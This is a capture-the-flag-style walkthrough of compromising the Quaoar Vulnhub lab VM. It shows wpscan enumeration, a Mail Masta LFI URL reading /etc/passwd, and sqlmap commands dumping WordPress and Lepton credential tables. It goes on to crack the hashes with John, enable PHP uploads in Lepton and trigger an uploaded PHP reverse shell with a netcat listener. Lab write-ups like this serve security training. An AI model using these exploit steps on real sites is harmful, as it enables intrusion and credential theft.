Quaoar: Revisited

I was sitting on the Vulnhub channel over the past week and someone brought up an issue on solving this VM but with a different method than I used previously. They were having a few issues with getting an exploit to work for a remote shell. Here is an additional way that I used to assist them getting access to the system without using any guessed credentials and getting a shell through Lepton. I found this to be a harder way to get a shell.

  1. Let’s rescan the WordPress installation but looking for vulnerable plugins.
    1. Command: wpscan –url http://172.16.2.17/wordpress –enumerate vp
  2. Looking through the plugins, it lists Mail Masta as being vulnerable to LFI (Local File Inclusion) which might allow us to read the files on the system and quite a few SQL injections.
  3. We will now check searchsploit for Proof of Concept code or instructions on how to exploit these vulnerabilities.
    1. Command: searchsploit “Mail Masta”
  4. Checking 40290.txt, we see that we can browse to view local files that the WordPress account can access.
    1. First, we will check for the default /etc/passwd where user accounts are stored. Then we will move onto /etc/shadow as that would be the quickest win; dump account password hashes.
    2. Site: http://172.16.2.17/wordpress/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd
    3. Checking the other site for /etc/shadow, we see that we cannot see the contents which means we do not have read access to the file.
    4. Site: http://172.16.2.17/wordpress/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/shadow
  5. Reading 41438.txt shows a few options but the best might be at the top as it is unauthenticated.
    1. https://www.exploit-db.com/exploits/41438/
      Mail-Masta SQL Injection 
      
      Page: ./wp-content/plugins/mail-masta/inc/lists/csvexport.php (Unauthenticated) 
      
      GET Parameter: list_id 
      
      http://my_wp_app/wp-content/plugins/mail-masta/inc/lists/csvexport.php?list_id=0+OR+1%3D1&pl=/var/www/html/wordpress/wp-load.php
  6. This basically will take us to a website where we set the list_id to 0 OR 1 = 1. This is a common SQLi technique against the database. We will browse the website and collect the GET request that is sent to the server to feed into SQLMap.
    1. Browse to the following site with Wireshark open. Copy the HTTP for the GET request and paste into a text file. We will use this to run SQLMap with it.
    2. Site: http://172.16.2.17/wordpress/wp-content/plugins/mail-masta/inc/lists/csvexport.php?list_id=0+OR+1%3D1&pl=/var/www/html/wordpress/wp-load.php
    3. Additional Resource: https://www.owasp.org/index.php/Testing_for_SQL_Injection_(OTG-INPVAL-005)
  7. However, in the previous step, we do not receive any text on the screen or file download that you would expect when browsing the site. We will change this to another directory in the pl parameter.
    1. Site: http://172.16.2.17/wordpress/wp-content/plugins/mail-masta/inc/lists/csvexport.php?list_id=0+OR+1%3D1&pl=/var/www/wordpress/wp-load.php
    2. This prompts us to download a .csv file as expected.
  8. Since we know that the website is running WordPress, we know that the SQL database is MySQL and we will specify this in the command.
    1. Command: sqlmap -r request –dbms=mysql -p list_id
    2. R = Loads the HTTP request file.
    3. dbms = This specifies the database to use for this website.
    4. P = This is the parameter that we will try the injection on.
  9. We will run a few commands to extract more information from the databases. Hopefully, we will encounter usernames and credentials as WordPress stores this information in MySQL.
    1. Command: sqlmap -r request –dbms=mysql -p list_id –dbs
    2. Command: sqlmap -r request –dbms=mysql -p list_id –tables -D wordpress
    3. This shows that we have a standard WordPress database, so we will dump the data from wp_users as this is the default location for WordPress credentials.
    4. Command: sqlmap -r request -p list_id –dbms=mysql –dump -D wordpress -T wp_users
  10. We now have the admin and wpuser hashes for the WordPress installation but we will come back to this as we still have some possible interesting databases to look through.
    1. Command: sqlmap -r request -p list_id –dbms=mysql –tables -D test
    2. The below highlights a database (test), that does not have any tables. We checked it against a list of common names but nothing was found in it.
    3. Command: sqlmap -r request -p list_id –dbms=mysql –tables -D Lepton
    4. Command: sqlmap -r request -p list_id –dbms=mysql –dump -D Lepton -T lep_users
  11. Now that we have a few hashes to crack, we will use Hash-Identifier to see which hashes they are. WordPress uses MD5 to store passwords and will get us access to the database.
    1. Lepton Hashes (admin): 5f4dcc3b5aa765d61d8327deb882cf99
    2. WordPress (admin): $P$BAgwFlu99OZUliqTgTIrUmBbtIjRMul
    3. WordPress (wpuser): $P$BdcZZVb0ssMccLUlECFCtUihocqQ0S.
  12. Ran John against the hashes to receive the passwords from the tables wp_users and lep_users
    1. Command (lep_users): john –wordlist=/rockyou.txt –format=Raw-MD5 –pot=Lepton.pot Lepton

      1. Username: admin
      2. Password: password
    2. Command (wp_users): john –wordlist=/rockyou.txt wp_user

      1. Username: admin
      2. Password: admin
      3. You likely do not need to use the –pot= argument; I used it on mine as John is not working correctly.
  1. Now that we have credentials we can log into WordPress and try to exploit it, but let’s see if we can use Lepton to get a shell. Doing a few google searches, this is a content management system for websites. Just going to /upload, we receive the following website:

    1. Unfortunately, a lot of this website is pulling a lot of this content from http://192.168.0.190 and we cannot get to the referenced /admins file.
    2. We will need to figure out a way around this by redirecting this address (192.168.0.190) back at 172.16.2.17 and see if the page loads. Luckily on Linux, we can accomplish this easily with IPTables and NAT.
    3. Command: iptables -t nat -A OUTPUT -p all -d 192.168.0.190 -j DNAT –to-destination 172.16.2.17
    4. With this command, we can now browse to the website /upload and actually view content.
  2. We will browse to http://172.16.2.17/upload/admins to get the login prompt. Note: The path http://172.16.2.17/admins does not load and took me a few tries with experimenting with the URL.
  3. With the ability to log into Lepton, we will look around to see which options are available to us and we discover quite a few from uploading files to Javascript.
    1. We will first go to Settings > Server Settings > Show Advanced Options
    2. Let’s check mark the option to enable world-writable file permissions and add PHP files to the upload list.
  4. Now we will upload a standard php-reverse-shell.php file from /usr/share/webshells/php and modify it to call back to our Kali box.
  5. Browse to the URL http://172.16.2.17/upload/media/php-reverse-shell.php while a netcat listener is open.
    1. Command: nc -lvnp 443
  6. We receive a shell! From here we can go back to the privilege escalation found at https://natesec.com/quaoar/.